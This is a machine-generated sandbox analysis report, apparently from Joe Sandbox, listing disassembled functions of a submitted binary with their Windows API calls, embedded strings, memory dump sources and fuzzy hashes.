                                    • Instruction ID: 450799b901c40a9ffc02c8bc0152efc76d9ddd7398ee1bc183509c65418014eb
                                    • Opcode Fuzzy Hash: 7f9bae572af1f5875191117fd9569478a5b8fc060a52fad913529e1a8576a8b8
                                    • Instruction Fuzzy Hash: 5541AF34008544AFDB285F28E8C9BB93B66AB06731F184761FD668E5F6D730CD82DB21
                                    Function 0017690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                    • String ID:
                                    • API String ID: 136442275-0
                                    • Opcode ID: 560ac3744111ef991b24a552cd1b949b42e57f877fc57a99b2087390bb91a490
                                    • Instruction ID: b3185ea96ab00b7a61fee32a407b7c0fda2c1adca6e7c13911eed756f5595895
                                    • Opcode Fuzzy Hash: 560ac3744111ef991b24a552cd1b949b42e57f877fc57a99b2087390bb91a490
                                    • Instruction Fuzzy Hash: 81410C7684511CAECF62EB94CC45DDE73BCEB58310F0041E6BA69A6051EB70ABE98F50
                                    Function 0017D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                                    Download Yara Rule
                                    APIs
                                    • CharLowerBuffW.USER32(001CDC00,001CDC00,001CDC00), ref: 0017D7CE
                                    • GetDriveTypeW.KERNEL32(?,001E3A70,00000061), ref: 0017D898
                                    • _wcscpy.LIBCMT ref: 0017D8C2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: BuffCharDriveLowerType_wcscpy
                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                    • API String ID: 2820617543-1000479233
                                    • Opcode ID: b43ffb063aab08e33e9a13779ebaad1ced2f39b9f66e06ebefd3a8927da2e5d8
                                    • Instruction ID: 60102d075cfa191258a6d14cc7450a493db6a4d0aa214c0bb0fab650c3c433a3
                                    • Opcode Fuzzy Hash: b43ffb063aab08e33e9a13779ebaad1ced2f39b9f66e06ebefd3a8927da2e5d8
                                    • Instruction Fuzzy Hash: 7F519031504244AFC704EF14E881A6EB7B5EFA4314F60C92DF9AE672A2DB31DD45CB42
                                    Function 0013936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                    Download Yara Rule
                                    APIs
                                    • __swprintf.LIBCMT ref: 001393AB
                                    • __itow.LIBCMT ref: 001393DF
                                      • Part of subcall function 00151557: _xtow@16.LIBCMT ref: 00151578
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __itow__swprintf_xtow@16
                                    • String ID: %.15g$0x%p$False$True
                                    • API String ID: 1502193981-2263619337
                                    • Opcode ID: 84b94bc4cdafc59a790a1f26fd5b3e211ca21ce8ac1eb7a68096ad1dfd466278
                                    • Instruction ID: 79cdbd94747a7887d57b6290feb78bb8b66f47c0cdbf8f7504e9ad3c9a539685
                                    • Opcode Fuzzy Hash: 84b94bc4cdafc59a790a1f26fd5b3e211ca21ce8ac1eb7a68096ad1dfd466278
                                    • Instruction Fuzzy Hash: 2A412675504204EBDB28EF74D942EAA77E4FF89310F20446EE45ED72C1EBB19901CB51
                                    Function 0019A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0019A259
                                    • CreateCompatibleDC.GDI32(00000000), ref: 0019A260
                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0019A273
                                    • SelectObject.GDI32(00000000,00000000), ref: 0019A27B
                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0019A286
                                    • DeleteDC.GDI32(00000000), ref: 0019A28F
                                    • GetWindowLongW.USER32(?,000000EC), ref: 0019A299
                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0019A2AD
                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0019A2B9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                    • String ID: static
                                    • API String ID: 2559357485-2160076837
                                    • Opcode ID: c306941addae7d16a911bca5901df2858d628b11712eadf228eb637597a99d90
                                    • Instruction ID: e3b39247c4dccdf651c2298bae27c6c685a52d566757230a28584adb5fea5b6b
                                    • Opcode Fuzzy Hash: c306941addae7d16a911bca5901df2858d628b11712eadf228eb637597a99d90
                                    • Instruction Fuzzy Hash: 88319C31100215BBDF259FA4EC49FEA3B69FF1A760F110324FA19A60A0D732D851DBA5
                                    Function 00176F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                    • String ID: 0.0.0.0
                                    • API String ID: 2620052-3771769585
                                    • Opcode ID: 3c4adbf1d837359cfee38d7c0f90a970886b093d7a0518a0ecc7f9b95bf5203a
                                    • Instruction ID: 2caad446cc12a01037fd2626484638d5be1718e79500dd46a4b93bc32c67a134
                                    • Opcode Fuzzy Hash: 3c4adbf1d837359cfee38d7c0f90a970886b093d7a0518a0ecc7f9b95bf5203a
                                    • Instruction Fuzzy Hash: B1113632904105ABCB28ABB0AC0AEEA77BCEF14711F0041A9F419A6091FF70DEC58B50
                                    Function 0015500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00155047
                                      • Part of subcall function 00157C0E: __getptd_noexit.LIBCMT ref: 00157C0E
                                    • __gmtime64_s.LIBCMT ref: 001550E0
                                    • __gmtime64_s.LIBCMT ref: 00155116
                                    • __gmtime64_s.LIBCMT ref: 00155133
                                    • __allrem.LIBCMT ref: 00155189
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001551A5
                                    • __allrem.LIBCMT ref: 001551BC
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001551DA
                                    • __allrem.LIBCMT ref: 001551F1
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0015520F
                                    • __invoke_watson.LIBCMT ref: 00155280
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                    • String ID:
                                    • API String ID: 384356119-0
                                    • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                    • Instruction ID: 4cce7bb5368e3ac8857b8257498679e71e4b23f78655fefd130990cb4f1f77e3
                                    • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                    • Instruction Fuzzy Hash: A371F872A00F16EBD7149E78CCA2B6A77AAAF14365F154229FC20DF6C2E770D94487D0
                                    Function 00174DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00174DF8
                                    • GetMenuItemInfoW.USER32(001F1708,000000FF,00000000,00000030), ref: 00174E59
                                    • SetMenuItemInfoW.USER32(001F1708,00000004,00000000,00000030), ref: 00174E8F
                                    • Sleep.KERNEL32(000001F4), ref: 00174EA1
                                    • GetMenuItemCount.USER32(?), ref: 00174EE5
                                    • GetMenuItemID.USER32(?,00000000), ref: 00174F01
                                    • GetMenuItemID.USER32(?,-00000001), ref: 00174F2B
                                    • GetMenuItemID.USER32(?,?), ref: 00174F70
                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00174FB6
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00174FCA
                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00174FEB
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                    • String ID:
                                    • API String ID: 4176008265-0
                                    • Opcode ID: 8b24b29b7ed72e7bd0ae483c372f5cf40ff8b47070a9d51d0188979d0ac40e8b
                                    • Instruction ID: e1ddd38230bbb8626f869b0dde65c957e2c8b0e22b5dfd7e393803cf36755ca3
                                    • Opcode Fuzzy Hash: 8b24b29b7ed72e7bd0ae483c372f5cf40ff8b47070a9d51d0188979d0ac40e8b
                                    • Instruction Fuzzy Hash: 8861CF70900249AFDB25CFA8DC88ABE7BB9FB05308F148159F849E3250E731AD44CB60
                                    Function 00199C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00199C98
                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00199C9B
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00199CBF
                                    • _memset.LIBCMT ref: 00199CD0
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00199CE2
                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00199D5A
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$LongWindow_memset
                                    • String ID:
                                    • API String ID: 830647256-0
                                    • Opcode ID: 49f9c78242b8f7f0c4911c2448aa403882066fa7d3bb5bad0f9f1719e1327d05
                                    • Instruction ID: e119929cdd5c66234a30c98d14ac50bcd312d883c5e25585a613c73426368062
                                    • Opcode Fuzzy Hash: 49f9c78242b8f7f0c4911c2448aa403882066fa7d3bb5bad0f9f1719e1327d05
                                    • Instruction Fuzzy Hash: D9616975900208EFDB11DFA8CC81EEEB7B8EF09714F14415AFA15E7291D7B0AA46DB50
                                    Function 001694E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 001694FE
                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00169549
                                    • VariantInit.OLEAUT32(?), ref: 0016955B
                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 0016957B
                                    • VariantCopy.OLEAUT32(?,?), ref: 001695BE
                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 001695D2
                                    • VariantClear.OLEAUT32(?), ref: 001695E7
                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 001695F4
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001695FD
                                    • VariantClear.OLEAUT32(?), ref: 0016960F
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0016961A
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                    • String ID:
                                    • API String ID: 2706829360-0
                                    • Opcode ID: 0bd6b6de935393821d5c3c5d2e7adb546034cf821401a448be0a9c8ec4385673
                                    • Instruction ID: f5357a6b471ff64cdd2837a91448651bb59c6602591da0e11246eb40ec251324
                                    • Opcode Fuzzy Hash: 0bd6b6de935393821d5c3c5d2e7adb546034cf821401a448be0a9c8ec4385673
                                    • Instruction Fuzzy Hash: 0B413D75A00219EFCB05EFA4DC849DEBF79FF48354F008165F502A3661EB31AA95CBA1
                                    Function 0018BB08 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 264COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit$_memset
                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                    • API String ID: 2862541840-1765764032
                                    • Opcode ID: 9519464341b34a30aab48e7a3817f85d39910586182f1b87d3b60cdf6bda93ff
                                    • Instruction ID: a93e0441dfae39693838fe2d76470bd060147c66f92feec311d3bf0edd9c4c4a
                                    • Opcode Fuzzy Hash: 9519464341b34a30aab48e7a3817f85d39910586182f1b87d3b60cdf6bda93ff
                                    • Instruction Fuzzy Hash: 89919271A04215AFDF24EF95C884FAEBBB8EF45714F108559F515AB280DB709A44CFA0
                                    Function 0018ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0013936C: __swprintf.LIBCMT ref: 001393AB
                                      • Part of subcall function 0013936C: __itow.LIBCMT ref: 001393DF
                                    • CoInitialize.OLE32 ref: 0018ADF6
                                    • CoUninitialize.COMBASE ref: 0018AE01
                                    • CoCreateInstance.COMBASE(?,00000000,00000017,001BD8FC,?), ref: 0018AE61
                                    • IIDFromString.COMBASE(?,?), ref: 0018AED4
                                    • VariantInit.OLEAUT32(?), ref: 0018AF6E
                                    • VariantClear.OLEAUT32(?), ref: 0018AFCF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                    • API String ID: 834269672-1287834457
                                    • Opcode ID: 98915bbbe04ab34921d4b4e324540a5b4bbce214f462627a9f932479cf086a85
                                    • Instruction ID: ac22a86ab1263026fadf4fc80d294ce830f5f34a115a09737af76ca002c717d7
                                    • Opcode Fuzzy Hash: 98915bbbe04ab34921d4b4e324540a5b4bbce214f462627a9f932479cf086a85
                                    • Instruction Fuzzy Hash: 206190702087019FE714EF64D884B6EB7E8AF48714F50491AFA859B291D770EE44CF93
                                    Function 00188107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WSAStartup.WS2_32(00000101,?), ref: 00188168
                                    • inet_addr.WS2_32(?), ref: 001881AD
                                    • gethostbyname.WS2_32(?), ref: 001881B9
                                    • IcmpCreateFile.IPHLPAPI ref: 001881C7
                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00188237
                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0018824D
                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 001882C2
                                    • WSACleanup.WS2_32 ref: 001882C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                    • String ID: Ping
                                    • API String ID: 1028309954-2246546115
                                    • Opcode ID: 0ef4a09757f249a4cbec7be456c56d122a67e46ba892502a1aac4790e50fe2c6
                                    • Instruction ID: 031bacb6697a1dde05b3a695278a3dc165d87cd187609ca2cc8d64cd388faa22
                                    • Opcode Fuzzy Hash: 0ef4a09757f249a4cbec7be456c56d122a67e46ba892502a1aac4790e50fe2c6
                                    • Instruction Fuzzy Hash: EA51BF316047009FD724AF64DC89B2ABBE5BF58320F448929FA59DB2A0DF30EA41CF41
                                    Function 0017E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 0017E396
                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0017E40C
                                    • GetLastError.KERNEL32 ref: 0017E416
                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 0017E483
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Error$Mode$DiskFreeLastSpace
                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                    • API String ID: 4194297153-14809454
                                    • Opcode ID: 2c1ae4ccaff906d24b5aed8cb62ff2081a8821f485127b5f51b29d04754b408e
                                    • Instruction ID: c6b34074a12816d807250989cc20d8ef8f8725b1f31827a19c7efd3d761884e7
                                    • Opcode Fuzzy Hash: 2c1ae4ccaff906d24b5aed8cb62ff2081a8821f485127b5f51b29d04754b408e
                                    • Instruction Fuzzy Hash: 5631A635A002059FDB05DF64D849AADB7F8FF58304F14C096F50AE7291D770DA41CB91
                                    Function 0016B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0016B98C
                                    • GetDlgCtrlID.USER32 ref: 0016B997
                                    • GetParent.USER32 ref: 0016B9B3
                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0016B9B6
                                    • GetDlgCtrlID.USER32(?), ref: 0016B9BF
                                    • GetParent.USER32(?), ref: 0016B9DB
